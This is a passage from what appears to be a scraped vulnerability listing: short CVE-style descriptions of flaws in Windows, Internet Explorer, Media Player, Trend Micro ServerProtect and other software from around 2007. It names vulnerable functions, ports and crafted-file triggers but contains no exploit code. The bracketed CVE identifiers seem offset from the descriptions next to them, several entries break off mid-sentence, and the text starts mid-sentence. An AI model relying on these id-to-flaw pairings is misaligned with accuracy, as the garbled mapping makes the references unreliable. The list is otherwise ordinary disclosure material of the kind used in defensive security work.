and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] 